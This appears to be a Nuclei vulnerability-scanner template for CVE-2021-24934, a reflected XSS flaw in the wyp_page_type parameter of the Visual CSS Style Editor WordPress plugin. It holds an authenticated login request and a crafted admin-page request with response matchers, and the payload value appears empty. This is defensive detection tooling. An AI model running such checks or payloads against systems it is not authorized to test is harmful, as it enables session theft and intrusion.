id: CVE-2021-24934 info: name: Visual CSS Style Editor < 7.5.4 - Cross-Site Scripting author: Splint3r7 severity: medium description: | The plugin does not sanitise and escape the wyp_page_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue impact: | Attackers can inject malicious JavaScript via reflected XSS in the wyp_page_type parameter, potentially stealing administrator session cookies or modifying site appearance. remediation: | Update to the latest version of plugin. reference: - https://wpscan.com/vulnerability/0aa5a8d5-e736-4cd3-abfd-8e0a356bb6ef/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24934 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24934 cwe-id: CWE-79 epss-score: 0.01397 epss-percentile: 0.68923 cpe: cpe:2.3:a:yellowpencil:visual_css_style_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 vendor: yellowpencil product: visual_css_style_editor framework: wordpress publicwww-query: "/wp-content/plugins/yellow-pencil-visual-theme-customizer" tags: cve,cve2021,wordpress,wp,wp-plugin,yellowpencil,xss,authenticated,vuln http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1 - | GET /wp-admin/admin.php?page=yellow-pencil-editor&href=1&wyp_page_id=home&wyp_page_type=home&wyp_mode=single&wyp_page_type= HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_2 == 200' - 'contains(content_type_2, "text/html")' - 'contains_all(body_2, "", "yellow-pencil-iframe-data")' condition: and # digest: 4a0a00473045022018153da5d7d1631b19bb3ced78d5e7bb076d63cb083c429c1be8413f188c39d9022100fc58b805b294b741f9ec91a311c1a939a83d20078f521fc1a91e8b7dc1a40422:922c64590222798bb761d5b6d8e72950